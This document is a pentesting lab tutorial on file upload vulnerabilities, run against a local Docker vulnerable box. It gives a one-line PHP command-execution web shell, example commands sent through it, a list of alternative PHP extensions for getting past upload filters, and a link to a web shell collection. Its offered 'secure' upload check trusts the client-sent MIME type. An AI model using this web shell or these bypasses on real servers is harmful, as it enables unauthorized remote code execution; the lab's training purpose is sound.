Introduction
This lab focuses on file upload vulnerabilities, a common security issue in web applications. You will learn how to identify these vulnerabilities, understand their potential impact, and explore methods to exploit them. The lab provides hands-on experience with practical examples, enabling you to better understand web application security concepts and defensive measures.
Understanding File Upload Vulnerabilities
File upload vulnerabilities occur when web applications fail to properly validate uploaded files. This can allow attackers to upload malicious files, potentially leading to remote code execution on the server.
Let's examine a typical file upload implementation in PHP using the move_uploaded_file() function:
<?php
// The move_uploaded_file() function moves an uploaded file to a new location
// Returns true on success, false on failure
move_uploaded_file($file, $newloc);
Parameters:
$file: The uploaded file to move$newloc: The destination path for the file
A secure implementation should include proper validation, as shown in this example:
<?php
// Define allowed image extensions
$allowedExts = array("gif", "jpeg", "jpg", "png");
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp); // Get the file extension
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 204800) // Less than 200 KB
&& in_array($extension, $allowedExts))
{
if ($_FILES["file"]["error"] > 0)
{
echo "Error: " . $_FILES["file"]["error"] . "<br>";
}
else
{
echo "Uploaded file name: " . $_FILES["file"]["name"] . "<br>";
echo "File type: " . $_FILES["file"]["type"] . "<br>";
echo "File size: " . ($_FILES["file"]["size"] / 1024) . " KB<br>";
echo "Temporary file location: " . $_FILES["file"]["tmp_name"];
}
}
else
{
echo "Invalid file format";
}
?>
This code demonstrates several important security checks:
- File extension validation
- MIME type verification
- File size limitation
- Error handling
Without these validations, attackers could potentially upload malicious files that execute on the server.
Identifying the Server-side Language
Before exploiting a file upload vulnerability, it's crucial to identify the server-side language used by the web application. This information determines which type of file to upload for successful exploitation.
First, let's set up our lab environment:
docker run -d -p 82:80 --name pentesterlab-WebforPentest-1 -it jewel591/vulnbox:pentesterlab-WebforPentest-1 /bin/sh -c 'service apache2 start && tail -f /var/log/apache2/error.log' && docker exec pentesterlab-WebforPentest-1 chmod 777 /var/www/upload/images
After running this command, verify that the environment is accessible at: http://localhost:82
Methods to identify server-side language:
URL File Extensions:
.phpextensions indicate PHP.aspor.aspxextensions indicate ASP.NET.jspextensions indicate Java Server Pages
Server Headers:
- Microsoft IIS typically runs ASP.NET
- Apache or Nginx commonly run PHP
- Apache Tomcat runs JSP
You can use the Wappalyzer browser extension to automatically detect the web server and programming language:
In our lab environment, you should see:
Web Server: Apache
Backend Language: PHP
Uploading a Web Shell
Now that we've identified PHP as the server-side language, we'll upload a PHP web shell to execute commands on the server.
A collection of web shells can be found here:
https://github.com/iSecurity-Club/Pentest-Methodologies/tree/master/web-exploit-exp/fileupload/php
- Create a test file
phpinfo.phpin the/home/labex/projectdirectory:
<?php phpinfo(); ?>
Upload the file:
- Visit http://localhost:82/upload/example1.php
- Select and upload your phpinfo.php file
Verify the upload:
- Access http://localhost:82/upload/images/phpinfo.php
- You should see the PHP configuration information page
Create a command execution shell
shell.php:
<?php echo "Shell"; system($_GET['cmd']); ?>
Upload and test the shell:
- Upload shell.php using the same method
- Access http://localhost:82/upload/images/shell.php
- You may see a warning message (expected without parameters)
Execute commands:
Check current user: http://localhost:82/upload/images/shell.php?cmd=whoami Expected output: www-data
List files and system info: http://localhost:82/upload/images/shell.php?cmd=ls;uname%20-a Expected output: Directory listing and system information
Note: This lab demonstrates basic web shell functionality. Advanced topics like reverse shells and privilege escalation are covered in more advanced courses.
Bypassing Server Restrictions (Optional)
Some web applications implement file extension restrictions to prevent malicious file uploads. This section explores methods to bypass these restrictions.
When .php extensions are blocked, try alternative PHP extensions that may be executable:
Try uploading with
.php3extension:- Visit http://localhost:82/upload/example2.php
- Upload phpinfo.php3
- Access http://localhost:82/upload/images/phpinfo.php3
If unsuccessful, try
.pharextension:- Upload phpinfo.phar
- Access http://localhost:82/upload/images/phpinfo.phar
Common bypass extensions to try:
- .php3
- .php4
- .php5
- .phar
- .phtml
Note: Success depends on server configuration. Different servers may allow different extensions to execute as PHP code.
Summary
This lab covered essential aspects of file upload vulnerabilities:
Key Concepts:
- Understanding file upload vulnerability mechanisms
- Identifying server-side programming languages
- Uploading and executing web shells
- Bypassing file extension restrictions
Technical Skills Acquired:
- Server-side language detection
- Web shell creation and deployment
- Command execution through uploaded files
- Extension bypass techniques
Security Implications:
- Impact of insufficient file validation
- Importance of proper upload restrictions
- Server-side execution risks
This foundational knowledge prepares you for advanced web application security topics covered in subsequent courses.
